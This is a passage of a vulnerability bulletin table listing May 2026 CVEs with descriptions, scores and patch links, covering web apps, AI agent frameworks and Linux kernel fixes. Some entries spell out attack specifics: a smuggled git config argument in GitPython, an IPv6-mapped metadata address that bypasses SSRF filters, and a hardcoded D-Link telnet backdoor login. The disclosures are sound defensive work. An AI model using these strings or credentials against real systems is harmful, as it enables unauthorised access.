| omnifaces--omnifaces | OmniFaces is a utility library for Faces. Prior to versions 1.14.2, 2.7.32, 3.14.16, 4.7.5, and 5.2.3, there is a server-side EL injection leading to Remote Code Execution (RCE). This affects applications that use CDNResourceHandler with a wildcard CDN mapping (e.g. libraryName:*=https://cdn.example.com/*). An attacker can craft a resource request URL containing an EL expression in the resource name, which is evaluated server-side. This issue has been patched in versions 1.14.2, 2.7.32, 3.14.16, 4.7.5, and 5.2.3. | 2026-05-08 | 8.1 | CVE-2026-41883 | https://github.com/omnifaces/omnifaces/security/advisories/GHSA-vp6r-9m58-5xv8 |
| th30d4y--OpenLearnX | OpenLearnX is an open-source, decentralized learning and assessment platform. Prior to version 2.0.3, a remote code execution (RCE) vulnerability was identified in the OpenLearnX code execution environment, allowing sandbox escape and arbitrary command execution. This issue has been patched in version 2.0.3. | 2026-05-08 | 8.8 | CVE-2026-41900 | https://github.com/th30d4y/OpenLearnX/security/advisories/GHSA-8h25-q488-4hxw https://github.com/th30d4y/OpenLearnX/commit/14765d7d1856d564747c55c5412e2f38feab079e https://github.com/th30d4y/OpenLearnX/releases/tag/v2.0.3-security-fix |
| givanz--Vvveb | Vvveb before version 1.0.8.2 contains an authenticated remote code execution vulnerability in the admin code editor that allows low-privilege authenticated users to execute arbitrary code by exploiting insufficient file extension restrictions. Attackers with editor, author, contributor, or site_admin roles can write a malicious .htaccess file to map arbitrary extensions to the PHP handler, then upload PHP code with that extension to achieve unauthenticated remote code execution when the file is accessed via HTTP. | 2026-05-06 | 8.8 | CVE-2026-41934 | https://github.com/givanz/Vvveb/releases/tag/1.0.8.2 https://github.com/givanz/Vvveb/security/advisories/GHSA-vfjj-gcvv-w248 https://github.com/givanz/Vvveb/commit/1196561276a3f49da5a714fef89ac9a6c6f9e33b https://www.vulncheck.com/advisories/vvveb-authenticated-rce-via-code-editor |
| givanz--Vvveb | Vvveb before version 1.0.8.2 contains an XML external entity (XXE) injection vulnerability in the admin Tools/Import feature that allows authenticated site_admin users to read arbitrary files and modify database records. Attackers can exploit the XML parser configuration in system/import/xml.php to inject file:// or php://filter entity references that are resolved and persisted into the application database, enabling arbitrary file disclosure and administrator password hash overwriting for privilege escalation. | 2026-05-06 | 8.1 | CVE-2026-41936 | https://github.com/givanz/Vvveb/releases/tag/1.0.8.2 https://github.com/givanz/Vvveb/security/advisories/GHSA-rfxr-4xpm-wrp7 https://github.com/givanz/Vvveb/commit/86f7128a18edebe0ff47e3855558467eb0ef9106 https://www.vulncheck.com/advisories/vvveb-xml-external-entity-injection-via-import |
| givanz--Vvveb | Vvveb before version 1.0.8.2 contains an unrestricted file upload vulnerability in the media upload handler that allows authenticated users with media-upload permissions to bypass extension restrictions by uploading a .htaccess file to map .phtml extensions to the PHP handler. Attackers can upload a .phtml file containing arbitrary PHP code and trigger execution by sending an unauthenticated HTTP GET request to the uploaded file, resulting in remote code execution with web server privileges. | 2026-05-06 | 8.8 | CVE-2026-41938 | https://github.com/givanz/Vvveb/releases/tag/1.0.8.2 https://github.com/givanz/Vvveb/security/advisories/GHSA-wwmv-4g9g-p48g https://github.com/givanz/Vvveb/commit/54a9e846fb94192f1b31ae81d81d25c874662e6a https://www.vulncheck.com/advisories/vvveb-rce-via-media-upload-handler |
| inngest--inngest-js | Inngest is a platform for running event-driven and scheduled background functions with queueing, retries, and step orchestration. Versions 3.22.0 through 3.53.1 contain a vulnerability that allows unauthenticated remote attackers to exfiltrate environment variables from the host process via the serve() HTTP handler. The serve() handler implements GET, POST, and PUT methods. Requests using PATCH, OPTIONS, or DELETE fall through to a generic handler that returns diagnostic information. A change introduced in v3.22.0 caused this diagnostic response to include the contents of process.env, exposing any secrets, API keys, or credentials present in the environment. An application is vulnerable if its serve() endpoint is reachable via PATCH, OPTIONS, or DELETE requests, which is common in setups like Next.js Pages Router or Express's app.use(...). Not affected are Next.js App Router handlers that export only GET, POST, and PUT, and applications using the connect worker method. This issue has been fixed in version 3.54.0. To work around this issue if upgrading is not immediately possible, restrict the serve() endpoint at the framework or reverse-proxy layer to accept only GET, POST, and PUT. The Inngest serve() endpoint does not require any other HTTP methods. | 2026-05-07 | 8.6 | CVE-2026-42047 | https://github.com/inngest/inngest-js/security/advisories/GHSA-2jf5-6wwv-vhxx https://github.com/inngest/inngest-js/releases/tag/inngest%403.54.1 |
| EvoMap--evolver | Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a path traversal vulnerability in the skill download (fetch) command allows attackers to write files to arbitrary locations on the filesystem. The --out= flag accepts user-provided paths without validation, enabling directory traversal attacks that can overwrite critical system files or create files in sensitive location. This issue has been patched in version 1.69.3. | 2026-05-04 | 8.1 | CVE-2026-42075 | https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j https://github.com/EvoMap/evolver/releases/tag/v1.69.3 |
| icip-cas--PPTAgent | PPTAgent is an agentic framework for reflective PowerPoint generation. Prior to commit 418491a, PPTAgent is vulnerable to arbitrary code execution via Python eval() of LLM-generated code with builtins in scope. This issue has been patched via commit 418491a. | 2026-05-04 | 8.6 | CVE-2026-42079 | https://github.com/icip-cas/PPTAgent/security/advisories/GHSA-89g2-xw5c-v95p https://github.com/icip-cas/PPTAgent/commit/418491a9a1c02d9d93194b5973bb58df35cf9d00 |
| OpenC3--cosmos | OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to versions 6.10.5 and 7.0.0-rc3, the OpenC3 password change functionality allows a user to change their password without providing the old password, by accepting a valid session token instead. In assumed breach scenarios, this behaviour can be exploited by an attacker who has already obtained a valid session token, to gain persistence in hijacked account (including admin) and prevent legitimate users from accessing the account. This issue has been patched in versions 6.10.5 and 7.0.0-rc3. | 2026-05-04 | 8.1 | CVE-2026-42084 | https://github.com/OpenC3/cosmos/security/advisories/GHSA-wgx6-g857-jjf7 https://github.com/OpenC3/cosmos/commit/2e623714e3426d5ae81b6f8239d4a2a6937ef776 https://github.com/OpenC3/cosmos/releases/tag/v6.10.5 https://github.com/OpenC3/cosmos/releases/tag/v7.0.0-rc3 |
| avo-hq--avo | Avo is a framework to create admin panels for Ruby on Rails apps. Prior to version 3.31.2, a broken access control vulnerability was identified in the ActionsController of the Avo framework. Due to insecure action lookup logic, an authenticated user can execute any Action class (descendants of Avo::BaseAction) on any resource, even if the action is not registered for that specific resource. This leads to Privilege Escalation and unauthorized data manipulation across the entire application. This issue has been patched in version 3.31.2. | 2026-05-08 | 8.8 | CVE-2026-42205 | https://github.com/avo-hq/avo/security/advisories/GHSA-qc5p-3mg5-9fh8 https://github.com/avo-hq/avo/releases/tag/v3.31.2 |
| gitpython-developers--GitPython | GitPython is a python library used to interact with Git repositories. From version 3.1.30 to before version 3.1.47, GitPython blocks dangerous Git options such as --upload-pack and --receive-pack by default, but the equivalent Python kwargs upload_pack and receive_pack bypass that check. If an application passes attacker-controlled kwargs into Repo.clone_from(), Remote.fetch(), Remote.pull(), or Remote.push(), this leads to arbitrary command execution even when allow_unsafe_options is left at its default value of False. This issue has been patched in version 3.1.47. | 2026-05-07 | 8.8 | CVE-2026-42215 | https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rpm5-65cw-6hj4 https://github.com/gitpython-developers/GitPython/releases/tag/3.1.47 |
| 0xJacky--nginx-ui | Nginx UI is a web user interface for the Nginx web server. From version 2.0.0 to before version 2.3.8, an unauthenticated network attacker can claim the initial administrator account on a fresh nginx-ui instance during the first-run setup window. The public /api/install endpoint is reachable without authentication, and the request-encryption flow only protects payload confidentiality in transit; it does not authenticate who is allowed to perform installation. A remote attacker who reaches the service before the legitimate operator can set the admin email, username, and password, causing permanent initial-instance takeover. This issue has been patched in version 2.3.8. | 2026-05-04 | 8.1 | CVE-2026-42221 | https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h27v-ph7w-m9fp https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8 |
| 0xJacky--nginx-ui | Nginx UI is a web user interface for the Nginx web server. In version 2.3.5, an unauthenticated bootstrap takeover exists in nginx-ui during the initial installation window exposed by POST /api/install. At time of publication no public patches are available. | 2026-05-04 | 8.1 | CVE-2026-42222 | https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-mxqh-q9h6-v8pq |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to version 3.35.10, the budibase:auth cookie containing the JWT session token is set with httpOnly: false at packages/backend-core/src/utils/utils.ts:218. JavaScript can read this cookie via document.cookie. This means every XSS becomes a full account takeover - the attacker steals the JWT and has persistent access to the victim's account. The cookie also lacks secure: true (sent over plaintext HTTP) and sameSite attribute. This issue has been patched in version 3.35.10. | 2026-05-07 | 8.1 | CVE-2026-42239 | https://github.com/Budibase/budibase/security/advisories/GHSA-4f9j-vr4p-642r https://github.com/Budibase/budibase/releases/tag/3.35.10 |
| openziti--zrok | zrok is software for sharing web services, files, and network resources. Prior to version 2.0.2, the zrok WebDAV drive backend (davServer.Dir) restricts path traversal through lexical normalization but does not prevent symlink following. When a symbolic link inside the shared DriveRoot points to a location outside that root, remote WebDAV consumers can read files and-on shares without OS-level permission restrictions-write or overwrite files anywhere on the host filesystem accessible to the zrok process. This issue has been patched in version 2.0.2. | 2026-05-08 | 8.7 | CVE-2026-42275 | https://github.com/openziti/zrok/security/advisories/GHSA-74m3-9qvm-rp9h https://github.com/openziti/zrok/commit/459bcfc1e121decae1b1d11c37ad94e4ed5bbf2e https://github.com/openziti/zrok/releases/tag/v2.0.2 |
| gitpython-developers--GitPython | GitPython is a python library used to interact with Git repositories. Prior to version 3.1.47, _clone() validates multi_options as the original list, then executes shlex.split(" ".join(multi_options)). A string like "--branch main --config core.hooksPath=/x" passes validation (starts with --branch), but after split becomes ["--branch", "main", "--config", "core.hooksPath=/x"]. Git applies the config and executes attacker hooks during clone. This issue has been patched in version 3.1.47. | 2026-05-07 | 8.1 | CVE-2026-42284 | https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-x2qx-6953-8485 https://github.com/gitpython-developers/GitPython/releases/tag/3.1.47 |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to versions 3.7.14 and 4.0.5, a user with create Workflow permission can bypass templateReferencing: Strict to get host network access, switch service accounts, override pod security context, add tolerations to schedule on control-plane nodes, or enable SA token mounting. This defeats the stated purpose of the feature. The practical impact depends on what Kubernetes-level controls are in place. Clusters with PodSecurity admission or OPA/Gatekeeper would independently block some of these (like hostNetwork). Clusters that rely on Argo's Strict mode as the primary enforcement layer are fully exposed. This issue has been patched in versions 3.7.14 and 4.0.5. | 2026-05-09 | 8.1 | CVE-2026-42296 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-3775-99mw-8rp4 https://github.com/argoproj/argo-workflows/commit/534f4ff1cbd86908e8ff76d97d553ad5a49a950d https://github.com/argoproj/argo-workflows/releases/tag/v3.7.14 https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5 |
| geopython--pygeoapi | pygeoapi is a Python server implementation of the OGC API suite of standards. From version 0.23.0 to before version 0.23.3, OGC API process execution requests can use the subscriber object to requests to internal HTTP services. This issue has been patched in version 0.23.3. | 2026-05-08 | 8.6 | CVE-2026-42352 | https://github.com/geopython/pygeoapi/security/advisories/GHSA-jgvc-94c8-3chc https://github.com/geopython/pygeoapi/commit/3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef https://github.com/geopython/pygeoapi/releases/tag/0.23.3 |
| i18next--i18next-http-middleware | i18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Prior to version 3.9.3, i18next-http-middleware passes the user-controlled lng and ns values from getResourcesHandler directly into i18next.services.backendConnector.load(languages, namespaces, …) without any sanitization. Depending on which backend is configured, the unvalidated path segments enable either path traversal or SSRF. This issue has been patched in version 3.9.3. | 2026-05-08 | 8.2 | CVE-2026-42353 | https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-jfgf-83c5-2c4m |
| GeoVision Inc.--GV-LPC2011/LPC2211 | A guessable session cookie vulnerability exists in the Web Interface functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted series of HTTP requests can lead to an authentication bypas. An attacker can bruteforce session cookies to trigger this vulnerability. | 2026-05-04 | 8.6 | CVE-2026-42365 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| D-Link--DIR-605L Firmware | D-Link DIR-605L Hardware Revision A1 (End-of-Life, EOL) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username "Alphanetworks" and the static password "wrgn35_dlwbr_dir605l" read from /etc/alpha_config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches. | 2026-05-04 | 8.8 | CVE-2026-42372 | D-Link DIR-605L Support Page |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.5 before 2026.4.10 contain a sandbox escape vulnerability allowing sandboxed agents to override exec routing by specifying host=node. Attackers can bypass sandbox boundaries and route execution to remote nodes instead of intended sandbox paths. | 2026-05-05 | 8.8 | CVE-2026-42434 | GitHub Security Advisory (GHSA-736r-jwj6-4w23) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.5 < 2026.4.10 - Sandbox Escape via host Parameter Override in Exec Routing |
| OpenClaw--OpenClaw | OpenClaw versions from 2026.2.22 before 2026.4.12 contain an insufficient shell-wrapper detection vulnerability allowing attackers to inject environment variable assignments at the argv level. Attackers can bypass exec preflight handling to manipulate high-risk shell variables like SHELLOPTS and PS4, affecting execution semantics and security controls. | 2026-05-05 | 8.8 | CVE-2026-42435 | GitHub Security Advisory (GHSA-j6c7-3h5x-99g9) Patch Commit VulnCheck Advisory: OpenClaw 2026.2.22 < 2026.4.12 - Shell-Wrapper Detection Bypass via Environment Variable Assignment Injection |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.10 contains a server-side request forgery policy bypass vulnerability in the browser tabs action select and close routes. Attackers can bypass configured browser SSRF policy protections by exploiting the /tabs/action endpoint to perform unauthorized tab navigation operations. | 2026-05-05 | 8.5 | CVE-2026-42439 | GitHub Security Advisory (GHSA-rj2p-j66c-mgqh) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.10 - SSRF Policy Bypass in Browser Tabs Action Routes |
| czlonkowski--n8n-mcp | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. In versions 2.47.4 through 2.47.13, the SDK embedder path (N8NDocumentationMCPServer constructor, getN8nApiClient(), and validateInstanceContext()), the synchronous URL validator in SSRFProtection.validateUrlSync() had no IPv6 checks. IPv4-mapped IPv6 addresses such as http://[::ffff:169.254.169.254] bypassed the cloud-metadata, localhost, and private-IP range checks. An attacker able to supply an n8nApiUrl value could cause the server to issue HTTP requests to cloud metadata endpoints, RFC1918 private networks, or localhost services. Response bodies are returned to the caller (non-blind SSRF), and the n8nApiKey is forwarded in the x-n8n-api-key header to the attacker-controlled target. Projects with deployments embedding n8n-mcp as an SDK using N8NDocumentationMCPServer or N8NMCPEngine with user-supplied InstanceContext are affected. The first-party HTTP server deployment was not primarily affected - it has a second async validator (validateWebhookUrl) that catches IPv6 addresses. This issue has been fixed in version 2.47.14. If users are unable to upgrade immediately as a workaround they can validate URLs before passing to the SDK, restrict egress at the network layer, and reject user-controlled n8nApiUrl values. | 2026-05-07 | 8.5 | CVE-2026-42449 | https://github.com/czlonkowski/n8n-mcp/security/advisories/GHSA-56c3-vfp2-5qqj https://github.com/czlonkowski/n8n-mcp/commit/9639f757853149f0cb16663cc8b6b6468f27a25f |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.1.0, /users/login issues a temporary JWT (temp_token) for TOTP-enabled accounts. That token carries a pendingTOTP state and should only be valid for the second-factor flow. However, the auth middleware accepts this token on regular authenticated endpoints. This effectively turns 2FA into single-factor (password) for impacted accounts. This issue has been patched in version 2.1.0. | 2026-05-08 | 8.1 | CVE-2026-42452 | https://github.com/Termix-SSH/Termix/security/advisories/GHSA-vx59-rf9w-9jv8 https://github.com/Termix-SSH/Termix/releases/tag/release-2.1.0-tag |
| gitroomhq--postiz-app | Postiz is an AI social media scheduling tool. From version 2.21.6 to before version 2.21.7, any authenticated user who can create a post can store arbitrary HTML in post content by tampering their own save request and send the public preview link /p/<postId>?share=true to another user. The preview page renders that stored HTML with dangerouslySetInnerHTML on the main application origin. This issue has been patched in version 2.21.7. | 2026-05-08 | 8.9 | CVE-2026-42556 | https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-hhxq-3wg7-4rj8 https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.7 |
| alextselegidis--plainpad | Plainpad is a self hosted note taking app. Prior to version 1.1.1, Plainpad allows a low-privilege authenticated user to self-escalate to administrator by submitting admin=true in PUT /api.php/v1/users/{id}. The endpoint directly persists the admin attribute from user input, and the escalated account can immediately access admin-only routes. This issue has been patched in version 1.1.1. | 2026-05-09 | 8.3 | CVE-2026-42562 | https://github.com/alextselegidis/plainpad/security/advisories/GHSA-pvfv-wvpm-q6f6 https://github.com/alextselegidis/plainpad/issues/138 https://github.com/alextselegidis/plainpad/commit/9216a876d27b22c3d9259551636d803f7cb075fc https://github.com/alextselegidis/plainpad/releases/tag/1.1.1 |
| AzuraCast--AzuraCast | AzuraCast is a self-hosted, all-in-one web radio management suite. Prior to version 0.23.6, the currentDirectory request parameter in the Flow.js media upload endpoint (POST /api/station/{station_id}/files/upload) is not sanitized for path traversal sequences. When combined with a local filesystem storage backend (the default), an authenticated user with media management permissions can write arbitrary files outside the station's media storage directory, achieving remote code execution by writing a PHP webshell to the web root. This issue has been patched in version 0.23.6. | 2026-05-09 | 8.8 | CVE-2026-42605 | https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-vp2f-cqqp-478j https://github.com/AzuraCast/AzuraCast/commit/18c793b4427eb49e67a2fea99a89f1c9d9dd808d https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6 |
| AzuraCast--AzuraCast | AzuraCast is a self-hosted, all-in-one web radio management suite. Prior to version 0.23.6, the ApplyXForwarded middleware unconditionally trusts the client-supplied X-Forwarded-Host HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker's server. The attacker then uses the token on the real instance to reset the victim's password and destroy their 2FA configuration, achieving full account takeover. This issue has been patched in version 0.23.6. | 2026-05-09 | 8.1 | CVE-2026-42606 | https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-gv7r-3mr9-h5x8 https://github.com/AzuraCast/AzuraCast/commit/7c622a18b451533de317e53862b1f84acf4efd85 https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: validate bsscfg indices in IF events brcmf_fweh_handle_if_event() validates the firmware-provided interface index before it touches drvr->iflist[], but it still uses the raw bsscfgidx field as an array index without a matching range check. Reject IF events whose bsscfg index does not fit in drvr->iflist[] before indexing the interface array. [add missing wifi prefix] | 2026-05-06 | 8.8 | CVE-2026-43110 | https://git.kernel.org/stable/c/3ec7437e9d11374105c2c4e47ae671537729d7e6 https://git.kernel.org/stable/c/9fca68c2512a362cad258e4df12a307bb2ee4b8e https://git.kernel.org/stable/c/1ae1e1caa428844e481231f6dbe9b4f475f1d52d https://git.kernel.org/stable/c/b427c2b05222db36d32ee141609de6128e9091bb https://git.kernel.org/stable/c/304950a467d83678bd0b0f46331882e2ac23b12d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/smb/client: fix out-of-bounds read in cifs_sanitize_prepath When cifs_sanitize_prepath is called with an empty string or a string containing only delimiters (e.g., "/"), the current logic attempts to check *(cursor2 - 1) before cursor2 has advanced. This results in an out-of-bounds read. This patch adds an early exit check after stripping prepended delimiters. If no path content remains, the function returns NULL. The bug was identified via manual audit and verified using a standalone test case compiled with AddressSanitizer, which triggered a SEGV on affected inputs. | 2026-05-06 | 8.8 | CVE-2026-43112 | https://git.kernel.org/stable/c/5d4fe469fe7dbff7d874c196bb680a82f2625d95 https://git.kernel.org/stable/c/2d29214448ec0f4e7e18bb1c14dd4a6c07f1c439 https://git.kernel.org/stable/c/86f9c23e0814cfdffda9eedf0c591c51ba209010 https://git.kernel.org/stable/c/49b1ce6d7cfb6c5a49f68bf5ccfcfb6ba14e63c3 https://git.kernel.org/stable/c/78ec5bf2f589ec7fd8f169394bfeca541b077317 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: wl1251: validate packet IDs before indexing tx_frames wl1251_tx_packet_cb() uses the firmware completion ID directly to index the fixed 16-entry wl->tx_frames[] array. The ID is a raw u8 from the completion block, and the callback does not currently verify that it fits the array before dereferencing it. Reject completion IDs that fall outside wl->tx_frames[] and keep the existing NULL check in the same guard. This keeps the fix local to the trust boundary and avoids touching the rest of the completion flow. | 2026-05-06 | 8.8 | CVE-2026-43113 | https://git.kernel.org/stable/c/b6ba1eacf276063ebeefbbae8056043c24f2efaf https://git.kernel.org/stable/c/df15adc692a802636dd3f258fc7cca8bf7a0ed9a https://git.kernel.org/stable/c/8d7465be5163a923ee5d7459719ef5a021c1584a https://git.kernel.org/stable/c/26ee518695c484f75e3606d631278e84bd24ae02 https://git.kernel.org/stable/c/0fd56fad9c56356e7fa7a7c52e7ecbf807a44eb0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix missing key size check for L2CAP_LE_CONN_REQ This adds a check for encryption key size upon receiving L2CAP_LE_CONN_REQ which is required by L2CAP/LE/CFC/BV-15-C which expects L2CAP_CR_LE_BAD_KEY_SIZE. | 2026-05-06 | 8.1 | CVE-2026-43134 | https://git.kernel.org/stable/c/335071c0c3637064ec250481f589075db44fe4e6 https://git.kernel.org/stable/c/fa6ad76fa8623c0a50d529cd5726fa5d819a3be4 https://git.kernel.org/stable/c/9118601ff90b79e8df3c0c98f48ae00c1b02ecef https://git.kernel.org/stable/c/481ea39b342c347b6ac029f3d418486280be4e45 https://git.kernel.org/stable/c/ec91078e132179b04e0c3906b599816c056ceaad https://git.kernel.org/stable/c/96581749c7c14fbec32c35728520867929600041 https://git.kernel.org/stable/c/8dd43f9a9323f9c01bc8246da8d81a4c783c9e97 https://git.kernel.org/stable/c/138d7eca445ef37a0333425d269ee59900ca1104 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm6: fix uninitialized saddr in xfrm6_get_saddr() xfrm6_get_saddr() does not check the return value of ipv6_dev_get_saddr(). When ipv6_dev_get_saddr() fails to find a suitable source address (returns -EADDRNOTAVAIL), saddr->in6 is left uninitialized, but xfrm6_get_saddr() still returns 0 (success). This causes the caller xfrm_tmpl_resolve_one() to use the uninitialized address in xfrm_state_find(), triggering KMSAN warning: ===================================================== BUG: KMSAN: uninit-value in xfrm_state_find+0x2424/0xa940 xfrm_state_find+0x2424/0xa940 xfrm_resolve_and_create_bundle+0x906/0x5a20 xfrm_lookup_with_ifid+0xcc0/0x3770 xfrm_lookup_route+0x63/0x2b0 ip_route_output_flow+0x1ce/0x270 udp_sendmsg+0x2ce1/0x3400 inet_sendmsg+0x1ef/0x2a0 __sock_sendmsg+0x278/0x3d0 __sys_sendto+0x593/0x720 __x64_sys_sendto+0x130/0x200 x64_sys_call+0x332b/0x3e70 do_syscall_64+0xd3/0xf80 entry_SYSCALL_64_after_hwframe+0x77/0x7f Local variable tmp.i.i created at: xfrm_resolve_and_create_bundle+0x3e3/0x5a20 xfrm_lookup_with_ifid+0xcc0/0x3770 ===================================================== Fix by checking the return value of ipv6_dev_get_saddr() and propagating the error. | 2026-05-06 | 8.6 | CVE-2026-43139 | https://git.kernel.org/stable/c/4f28141786e1fe884ce42a5197ba9beed540f0ea https://git.kernel.org/stable/c/6535867673bf301d52aa00593a4d1d18cc3922fa https://git.kernel.org/stable/c/eb2ee15290af14c60b45cf2b73f5687d1d077d9b https://git.kernel.org/stable/c/719918fc88df6da023dfff370cd965151a5afd7f https://git.kernel.org/stable/c/dc0abce055134cb83b0d981d31ceb20dda419787 https://git.kernel.org/stable/c/c7221e7bd8fc2ef38a0b27be580d9d202281306b https://git.kernel.org/stable/c/3dcd1664ac15eee6a690daec7c4ffc59190406f7 https://git.kernel.org/stable/c/1799d8abeabc68ec05679292aaf6cba93b343c05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: fix freemap adjustments when adding xattrs to leaf blocks xfs/592 and xfs/794 both trip this assertion in the leaf block freemap adjustment code after ~20 minutes of running on my test VMs: ASSERT(ichdr->firstused >= ichdr->count * sizeof(xfs_attr_leaf_entry_t) + xfs_attr3_leaf_hdr_size(leaf)); Upon enabling quite a lot more debugging code, I narrowed this down to fsstress trying to set a local extended attribute with namelen=3 and valuelen=71. This results in an entry size of 80 bytes. At the start of xfs_attr3_leaf_add_work, the freemap looks like this: i 0 base 448 size 0 rhs 448 count 46 i 1 base 388 size 132 rhs 448 count 46 i 2 base 2120 size 4 rhs 448 count 46 firstused = 520 where "rhs" is the first byte past the end of the leaf entry array. This is inconsistent -- the entries array ends at byte 448, but freemap[1] says there's free space starting at byte 388! By the end of the function, the freemap is in worse shape: i 0 base 456 size 0 rhs 456 count 47 i 1 base 388 size 52 rhs 456 count 47 i 2 base 2120 size 4 rhs 456 count 47 firstused = 440 Important note: 388 is not aligned with the entries array element size of 8 bytes. Based on the incorrect freemap, the name area starts at byte 440, which is below the end of the entries array! That's why the assertion triggers and the filesystem shuts down. How did we end up here? First, recall from the previous patch that the freemap array in an xattr leaf block is not intended to be a comprehensive map of all free space in the leaf block. In other words, it's perfectly legal to have a leaf block with: * 376 bytes in use by the entries array * freemap[0] has [base = 376, size = 8] * freemap[1] has [base = 388, size = 1500] * the space between 376 and 388 is free, but the freemap stopped tracking that some time ago If we add one xattr, the entries array grows to 384 bytes, and freemap[0] becomes [base = 384, size = 0]. So far, so good. But if we add a second xattr, the entries array grows to 392 bytes, and freemap[0] gets pushed up to [base = 392, size = 0]. This is bad, because freemap[1] hasn't been updated, and now the entries array and the free space claim the same space. The fix here is to adjust all freemap entries so that none of them collide with the entries array. Note that this fix relies on commit 2a2b5932db6758 ("xfs: fix attr leaf header freemap.size underflow") and the previous patch that resets zero length freemap entries to have base = 0. | 2026-05-06 | 8.8 | CVE-2026-43158 | https://git.kernel.org/stable/c/d08976725355b9d54d8332fce223fa281cc304a5 https://git.kernel.org/stable/c/6a8737afbccc340e718e0b22577312826390be8b https://git.kernel.org/stable/c/a396b3d73d51355e50acdb403ba9c4cae4c1174e https://git.kernel.org/stable/c/38613c01f69e1e77e6b8acab1e8ac665d01c2f15 https://git.kernel.org/stable/c/ef42a8766ff3fdf51cf72fb36d0859c09d134478 https://git.kernel.org/stable/c/43f3b18679615a93bd848afde3602ba160637a46 https://git.kernel.org/stable/c/24ce71852f2cee6581e2cbebc15489ed52bf63b7 https://git.kernel.org/stable/c/3eefc0c2b78444b64feeb3783c017d6adc3cd3ce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: fix 22000 series SMEM parsing If the firmware were to report three LMACs (which doesn't exist in hardware) then using "fwrt->smem_cfg.lmac[2]" is an overrun of the array. Reject such and use IWL_FW_CHECK instead of WARN_ON in this function. | 2026-05-06 | 8.8 | CVE-2026-43172 | https://git.kernel.org/stable/c/1d49a42717bdc8de77eabeb5b7d3e88d141ffea9 https://git.kernel.org/stable/c/2b4b1510aaaf5b9fb57327ecffc20c055f61f205 https://git.kernel.org/stable/c/58192b9ce09b0f0f86e2036683bd542130b91a98 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw89: pci: validate release report content before using for RTL8922DE The commit 957eda596c76 ("wifi: rtw89: pci: validate sequence number of TX release report") does validation on existing chips, which somehow a release report of SKB becomes malformed. As no clear cause found, add rules ahead for RTL8922DE to avoid crash if it happens. | 2026-05-06 | 8.8 | CVE-2026-43176 | https://git.kernel.org/stable/c/ebeaa3b24ba568ff8505165f954dba15cc53e4b3 https://git.kernel.org/stable/c/3e8a88b5e8b3506d9c5e031a65ba65ce9a0683a3 https://git.kernel.org/stable/c/5f93d611b33a05bd03d6843c8efe8cb6a1992620 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: delete attr leaf freemap entries when empty Back in commit 2a2b5932db6758 ("xfs: fix attr leaf header freemap.size underflow"), Brian Foster observed that it's possible for a small freemap at the end of the end of the xattr entries array to experience a size underflow when subtracting the space consumed by an expansion of the entries array. There are only three freemap entries, which means that it is not a complete index of all free space in the leaf block. This code can leave behind a zero-length freemap entry with a nonzero base. Subsequent setxattr operations can increase the base up to the point that it overlaps with another freemap entry. This isn't in and of itself a problem because the code in _leaf_add that finds free space ignores any freemap entry with zero size. However, there's another bug in the freemap update code in _leaf_add, which is that it fails to update a freemap entry that begins midway through the xattr entry that was just appended to the array. That can result in the freemap containing two entries with the same base but different sizes (0 for the "pushed-up" entry, nonzero for the entry that's actually tracking free space). A subsequent _leaf_add can then allocate xattr namevalue entries on top of the entries array, leading to data loss. But fixing that is for later. For now, eliminate the possibility of confusion by zeroing out the base of any freemap entry that has zero size. Because the freemap is not intended to be a complete index of free space, a subsequent failure to find any free space for a new xattr will trigger block compaction, which regenerates the freemap. It looks like this bug has been in the codebase for quite a long time. | 2026-05-06 | 8.8 | CVE-2026-43187 | https://git.kernel.org/stable/c/f3c0d1fc1eadbb4adbee5ab7757d41d35f48325b https://git.kernel.org/stable/c/aa9083d97e2157da3c6fb45ddb1a97af7f188f7f 